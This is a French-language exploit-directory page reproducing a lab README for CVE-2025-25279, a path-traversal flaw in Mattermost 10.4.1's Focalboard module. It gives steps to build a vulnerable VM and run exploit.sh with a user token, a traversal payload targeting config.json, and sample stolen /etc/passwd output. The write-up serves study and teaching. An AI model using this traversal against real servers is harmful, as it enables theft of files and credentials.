Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — Exploit de preuve de concept pour CVE-2025-25279, une vulnérabilité de traversée de chemin dans le module Focalboard de Mattermost 10.4.1, permettant l'exfiltration de fichiers arbitraires authentifiée via des pièces jointes conçues. | Kitploit
Outils/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

Exploit de preuve de concept pour CVE-2025-25279, une vulnérabilité de traversée de chemin dans le module Focalboard de Mattermost 10.4.1, permettant l'exfiltration de fichiers arbitraires authentifiée via des pièces jointes conçues.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 3 moisPas encore vérifié

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Path Traversal dans Focalboard permettant l’exfiltration de fichiers

🌟 Présentation

Cette preuve de concept démontre l’exploitation de la vulnérabilité CVE-2025-25279 affectant Mattermost 10.4.1.
Une faille dans Focalboard (le module de gestion de tableaux) permet une lecture arbitraire de fichiers via un path traversal dans les attachments.

L’exploit permet d’exfiltrer :

  • /etc/passwd
  • /etc/group
  • ou des fichiers sensibles de Mattermost, par exemple :
    opt/mattermost/config/config.json

L’attaque fonctionne uniquement avec un compte utilisateur authentifié dans les scénarios vulnérables.


🗂️ Organisation des répertoires

  • 📁 target : répertoire de création de la box cible
  • 📁 live : répertoire de création de VM(s) cible(s) et de démonstration de l'exploit
  • 📁 src : éventuel code source auxiliaire
  • 📁 refs : répertoire contenant les articles et la bibliographie
  • 📁 docs : documents associés produits lors du projet, y compris les enregistrements vidéo

🔧 Pré-requis

  • Vagrant
  • VirtualBox
  • Jeu de fichiers du projet (target + live)
  • Un compte Mattermost (PAT = Personal Access Token)
  • Linux/Mac/Windows avec Bash

📦 Téléchargement de Mattermost

Le dossier target/ n'est pas inclus (trop volumineux pour GitHub).

Télécharger manuellement : https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

Puis placer le fichier dans : target

Avant de déployer la VM

D'abord allez dans le repertoire target et faire:

root@kitploit:~
cd target
make mattermost.box

Assurez vous d'avoir la box mattermost-poc sinon la VM ne marche pas:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. Déploiement de la machine vulnérable

Lancer la VM

root@kitploit:~
cd live/vm1
vagrant up

Se connecter à la VM

root@kitploit:~
 vagrant ssh

créer un utilisateur dans l'interface web :

ouvrir: http://localhost:8065

créer un token dans UI (interface utilisateur):

Profil --> Security --> Personal Access Tokens

2. Installation de l’exploit

Depuis la machine hôte :

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. Exécuter l'exploit

root@kitploit:~
./exploit.sh

On vous demandera :

root@kitploit:~
PAT (Personal Access Token) :

👉 Entrez un PAT valide d’un utilisateur Mattermost.

📸 Exemple de sortie (exfiltration de /etc/passwd)

root@kitploit:~
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

Fichier ciblé : config.json

Pour viser un fichier Mattermost sensible :

Modifier en haut du script exploit.sh :

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L’exploit affichera alors le contenu du fichier config.json.

✒️ Auteurs

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 Démonstration vidéo

👉 Une démonstration complète en vidéo se trouve dans : live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 Notes

Ce PoC est strictement destiné aux environnements d'apprentissage. Ne jamais utiliser hors cadre pédagogique ou sans autorisation.

Télécharger l’outil